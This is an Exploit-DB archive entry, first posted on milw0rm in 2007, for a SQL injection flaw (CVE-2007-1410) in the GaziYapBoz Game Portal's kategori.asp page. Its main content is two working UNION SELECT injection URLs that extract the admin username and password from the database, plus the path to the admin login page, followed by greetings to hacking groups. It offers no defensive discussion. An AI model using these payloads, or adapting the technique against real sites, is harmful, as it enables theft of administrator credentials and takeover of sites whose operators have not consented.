GaziYapBoz Game Portal - 'kategori.asp' SQL Injection

EDB-ID:

3437

CVE:

2007-1410

EDB Verified:

Author:

CyberGhost

Type:

webapps

Exploit: /

Platform:

ASP

Date:

2007-03-08

Vulnerable App:

#Title  : GaziYapBoz Game Portal Remote SQL Injection Vulnerability
#Author : CyberGhost
#Page   : http://ucgenportal.somee.com/scriptler/gaziyapboz
#Download : http://www.aspindir.com/indir.asp?id=4765&sIslem=%DDndir

Vuln.

Username : /kategori.asp?kategori='+union+select+0,1,2,3,name,5,6,7,8,9+from+admin
Password : /kategori.asp?kategori='+union+select+0,1,2,3,password,5,6,7,8,9+from+admin

Login : /personelgirisizni.asp

====================================

Thanx : redLine - Hackinger - LiarHack - excellance - by_emR3 - kerem125 - Bolivar - Voltigore - CyberDefacer - ProfeSSionaL

And All TURKISH HACKERS

# milw0rm.com [2007-03-08]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services